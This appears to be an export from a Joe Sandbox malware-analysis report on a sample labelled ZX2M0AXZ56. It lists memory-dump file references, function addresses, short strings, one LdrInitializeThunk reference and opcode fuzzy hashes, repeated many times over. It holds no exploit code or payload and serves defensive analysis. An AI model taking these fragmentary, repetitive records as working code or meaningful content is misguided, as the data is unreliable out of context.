Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID:
String ID: 692E49CD1716A3B7BEBA0C6A975F1733
API String ID: 0-1734508920
Opcode ID: 5e5f4b039b1282f04adf00888c66dc96e1a5d627c536aeaf014b0a5723098ee4
Instruction ID: 63b00c3de077a22848b22845ce71bdea791fb14cb3f1395732befca408ece338
Opcode Fuzzy Hash: 5e5f4b039b1282f04adf00888c66dc96e1a5d627c536aeaf014b0a5723098ee4
Instruction Fuzzy Hash: 71814975640B418BD7248B39CC926E7B7E2EFDA315F0DC96CC4868B343E63CA8028764

Function 004EE110 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(004F148A,?,00000018,?,?,00000018,?,?,?), ref: 004EE13E

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 004D7440 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

_^]\, xrefs: 004D7465

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: InitializeThunk
String ID: _^]\
API String ID: 2994545307-3116432788
Opcode ID: a68949f45d9075f89886523fa0a146aa1b333c8790c1d13e66288449581b447a
Instruction ID: 7b78b87ef585aa4edb5598b7db3783119b5fccdd0919511e991cf1b1b61e557b
Opcode Fuzzy Hash: a68949f45d9075f89886523fa0a146aa1b333c8790c1d13e66288449581b447a
Instruction Fuzzy Hash: 6A7117B5A083005BE7149A29DCA2B7B76A1DF81318F18853FE58687392F27CDC05875E

Function 004F1720 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

=<32, xrefs: 004F176D

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: InitializeThunk
String ID: =<32
API String ID: 2994545307-852023076
Opcode ID: 4261909d922e4fa2d0c2ab73f33e79b947ee097a540ab653f4f8889b81c067d3
Instruction ID: de1bed899ce972c62c885b5e470c9605f54d36e4a64301fd0a982d3a09de542c
Opcode Fuzzy Hash: 4261909d922e4fa2d0c2ab73f33e79b947ee097a540ab653f4f8889b81c067d3
Instruction Fuzzy Hash: 29316838608308DBE714AA159D91B3BB795EB84790F18852EE789973B0D739EC50878A

Function 004D1A10 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

,-, xrefs: 004D1A64

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID:
String ID: ,-
API String ID: 0-1027024164
Opcode ID: 1b3fdfd862590b07dd8bed928fdddd6e01530f74772694eafdb147a9ed14197c
Instruction ID: 9a7d217f6a62e34135bf324619a83c8db213d26ea99d2d73260c7f4776fd9a0d
Opcode Fuzzy Hash: 1b3fdfd862590b07dd8bed928fdddd6e01530f74772694eafdb147a9ed14197c
Instruction Fuzzy Hash: DE2167A1A153109BC7109F29CC62537B7B1EF82364F45861FE8828B361F338CD05C7AA

Function 004F0340 Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

@, xrefs: 004F03AD

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
